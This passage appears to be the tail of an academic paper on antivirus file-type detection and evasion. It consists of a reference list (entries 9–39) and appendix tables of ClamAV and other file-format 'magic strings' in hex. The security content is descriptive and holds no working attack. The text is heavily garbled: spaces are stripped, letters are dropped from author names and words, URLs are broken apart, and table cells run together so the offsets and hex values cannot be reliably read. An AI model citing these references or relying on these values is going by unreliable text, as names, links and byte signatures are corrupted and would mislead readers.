Andersen,Z.
Mao,M.
Bailey,andJ.
Nazario.
Towardsanunderstandingofanti-virtualizationandanti-debuggingbehaviorinmodernmalware.
InDSN,2008.
[9]ClamAV.
http://www.
clamav.
net.
[10]http://cve.
mitre.
org/cgi-bin/cvekey.
cgikeyword=evasion,2012.
[11]EICAR—TheAnti-VirusorAnti-MalwareTestFile.
http://www.
eicar.
org/antivirustestle.
htm.
[12]T.
Garnkel.
Trapsandpitfalls:Practicalproblemsinsystemcallinterpositionbasedsecuritytools.
InNDSS,2003.
[13]T.
GarnkelandM.
Rosenblum.
Avirtualmachineintrospectionbasedarchitectureforintrusiondetection.
InNDSS,2003.
[14]M.
Gavin.
RecognizingcorruptandmalformedPDFles.
http://labs.
appligent.
com/presentations/recognizingmalformedpdff.
pdf.
[15]P.
Hooimeijer,B.
Livshits,D.
Molnar,P.
Saxena,andM.
Veanes.
FastandprecisesanitizeranalysiswithBEK.
InUSENIXSecurity,2011.
[16]M.
Hypponen.
Retroviruses-howvirusesghtback.
http://www.
hypponen.
com/staff/hermanni/more/papers/retro.
htm,1994.
[17]G.
Kessler.
Filesignaturestable.
http://www.
garykessler.
net/library/lesigs.
html,2012.
[18]McAfeeVirusScanvulnerability.
http://www.
pc1news.
com/news/0665/mcafeevirusscanvulnerability-allow-compressed-archives-to-bypass-the-scan-engine.
html,2009.
[19]J.
Nazario.
Mimesnifngandphishing.
http://http://asert.
arbornetworks.
com/2009/03/mime-snifng-and-phishing/,2009.
[20]J.
Oberheide,M.
Bailey,andF.
Jahanian.
PolyPack:Anautomatedonlinepackingserviceforoptimalantivirusevasion.
InWOOT,2009.
[21]J.
Oberheide,E.
Cooke,andF.
Jahanian.
CloudAV:N-versionantivirusinthenetworkcloud.
InUSENIXSecurity,2008.
[22]J.
OberheideandF.
Jahanian.
Remotengerprintingandexploitationofmailserverantivirusengines.
http://jon.
oberheide.
org/les/umich09-mailav.
pdf,2009.
[23]MicrosoftpatchbreaksImpress/PowerPointcompat-ibility.
http://user.
services.
openofce.
org/en/forum/viewtopic.
phpt=36515,2010.
[24]OpenOfce-MSinteroperabilitybugs.
http://openofce.
org/bugzilla/buglist.
cgikeywords=msinteroperability,2011.
[25]W.
Palant.
ThehazardsofMIMEsnifng.
http://adblockplus.
org/blog/the-hazards-of-mime-snifng,2007.
[26]S.
Porst.
HowtoreallyobfuscateyourPDFmal-ware.
http://www.
recon.
cx/2010/slides/recon2010sebastianporst.
pdf,2010.
[27]T.
PtacekandT.
Newsham.
Insertion,evasion,anddenialofservice:Eludingnetworkintrusiondetection,1998.
[28]T.
Scholte,D.
Balzarotti,andE.
Kirda.
QuovadisAstudyoftheevolutionofinputvalidationvulnerabilitiesinWebapplications.
InFC,2011.
[29]C.
Sheehan.
PimpmyPE:Parsingmaliciousandmal-formedexecutables.
http://research.
sunbelt-software.
com/ViperSDK/Pimp%20My%20PE.
ppt,2007.
[30]IEcontent-typelogic.
http://blogs.
msdn.
com/b/ie/archive/2005/02/01/364581.
aspx,2005.
[31]P.
Sz¨orandP.
Ferrie.
Huntingformetamor-phic.
http://www.
symantec.
com/avcenter/reference/hunting.
for.
metamorphic.
pdf.
[32]VirusTotal.
http://www.
virustotal.
com.
[33]VXHeavens.
http://vx.
netlux.
org/vl.
php.
[34]R.
Watson.
Exploitingconcurrencyvulnerabilitiesinsystemcallwrappers.
InWOOT,2007.
[35]J.
Weinberger,P.
Saxena,D.
Akhawe,M.
Finifter,R.
Shin,andD.
Song.
AsystematicanalysisofXSSsanitizationinWebapplicationframeworks.
InESORICS,2011.
[36]A.
WheelerandN.
Mehta.
0wningantivirus.
http://www.
blackhat.
com/presentations/bh-europe-05/bh-eu-05-wheeler-mehta-up.
pdf,2005.
[37]F.
Xue.
Attackingantivirus.
http://www.
blackhat.
com/presentations/bh-europe-08/Feng-Xue/Whitepaper/bh-eu-08-xue-WP.
pdf,2008.
[38]Anti-virussoftwaremaynotproperlyscanmalformedziparchives.
http://www.
kb.
cert.
org/vuls/id/968818,2005.
[39]Musingoninformationsecurity.
http://blog.
zoller.
lu/search/label/Advisory,2009.
APPENDIXTableXIIIEXAMPLESOFCLAMAV'SFIXED-OFFSET"MAGICSTRINGS"INTHEORDERTHEYARECHECKED.
OrderOffsetLengthFiletypeMagiccontentOrderOffsetLengthFiletypeMagiccontent109mirc.
ini5b616c69617365735d2505EVSmail582d45565322575TAR-POSIX757374617226017Mail582d4170706172656e746c792d546f3a20305RTF7b5c7274662704Mail546f3a204014SIPlog5349502d48495420285349502f482809Mail5375626a6563743a20584SIS190400102904compress.
exed535a4444664JPEG4a46494630013Maildir52657475726e2d706174683a20764JPEG4578696631013Maildir52657475726e2d506174683a20803MP3fffb9032010Rawmail52656365697665643a20903JPEGffd8ff3304RAR526172211008OLE2containerd0cf11e0a1b11ae13404RIFX524946581108CryptFFb6b9acaefeffffff3504RIFF524946461204PNG89504e473608ZIP504b3030504b03041304ELF7f454c463704ZIP504b03041404TNEF789f3e223804OggStream4f67675315014VPOP3(DOS)763a0d0a52656365697665643a2039012Mail4d6573736167652d49643a2016013VPOP3(UNIX)763a0a52656365697665643a2040012Mail4d6573736167652d49443a201706UUencoded626567696e204102MS-EXE4d5a1802ARJ60ea4204MSCAB4d5343461908Mail582d5549444c3a204304MSCHM4954534620011Symantec582d53796d616e7465632d4403MP34944332109Mail582d53696576653a2045026Qmailbounce48692e20546869732069732074686520716d61696c2d73656e6422011Mail582d5265616c2d546f3a204603GIF47494623015Mail582d4f726967696e616c2d546f3a204706Eximmail46726f6d3a2024017Mail582d456e76656c6f70652d46726f6d3a204805MBox46726f6d20TableXIV"MAGICSTRINGS"FORFILETYPESNOTSUPPORTEDBYCLAMAV(SOURCE:[17]).
MULTIPLEOFFSETSSEPARATEDBY","INDICATETHATTHEMAGICCONTENTCANAPPEARATANYOFTHEM.
OffsetLengthFiletypeMagiccontent08MSOfcelesD0CF11E0A1B11AE102TAR.
Z(LZW)1F9D02TAR.
Z(LZH)1FA008AR,MSCoff213C617263683E0A04PACK5041434B23LZA,LZH2D6C68067Zip377ABCAF271C5265PKZIPSFX504B53705829,1526WinZip57696E5A6970306PKLITE504B4C49544504PKZIP504B030404Zoo5A4F4F2048QuicktimeMOV6D6F6F760,3023EPS252150532D41646F62652D332E3020455053462D33203032769,34817,368655ISO4344303031